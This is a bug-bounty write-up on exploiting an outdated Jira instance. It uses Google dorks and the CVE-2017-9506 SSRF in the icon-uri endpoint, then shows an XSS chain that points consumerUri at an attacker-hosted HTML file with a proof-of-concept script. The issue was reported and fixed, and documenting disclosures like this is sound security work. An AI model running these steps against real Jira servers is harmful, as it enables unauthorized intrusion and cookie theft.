How Outdated JIRA Instances Suffer from Multiple Security Vulnerabilities
Hello friends. This is Yeasir Arafat again. In this article, I want to share what we can do when a target is running a third-party application like Jira.
I was testing a public bug bounty program called Visma. As usual, I did the recon process to collect its subdomains. A few of them, such as jira.visma.lv, caught my attention because they were running Jira.
If you are specifically looking for Jira subdomains of your targets, you can use Google dorks like these:
inurl:companyname intitle:JIRA login
inurl:visma intitle:JIRA login
I noticed that https://jira.visma.lv was running JIRA version 6.2.7. I remembered CVE-2017-9506, which affects Jira versions before 7.3.5: the IconUriServlet of the Atlassian OAuth plugin fetches whatever URL is passed in the consumerUri parameter of /plugins/servlet/oauth/users/icon-uri and returns the fetched content to the caller, giving an unauthenticated SSRF.
Loading an external site through the unauthenticated SSRF on https://jira.visma.lv.
I tried to reach internal assets and read data from them through the SSRF, but I was unable to. For scanning and exploitation, you can use a tool named `Jira-Scan`, available on GitHub.
You can create a simple HTML file containing an XSS payload, host it on your own server and point the vulnerable endpoint at it with consumerUri=http://yoursite.com/xsshostedfile. Because Jira returns the fetched body as its own response, the script executes in Jira's origin and triggers the XSS.
<title>SSRF to XSS on Jira Vulnerable Instances</title>
<script>
alert( document.domain + " is vulnerable" );
</script>
Turning the SSRF into XSS by hosting an HTML file. This also increases the severity of the vulnerability.
I know that merely loading an external site is a P4 severity bug. Fortunately, I was able to turn this SSRF into XSS. An attacker can now steal the victim's cookies (if the session cookie is not flagged HttpOnly) or, at minimum, make authenticated requests to Jira from the victim's browser.
After I sent a clean report about this vulnerability to Visma, they fixed the issue within a few hours. They told me that they would decommission the other subdomains that suffered from the same vulnerability.
- Yeasir Arafat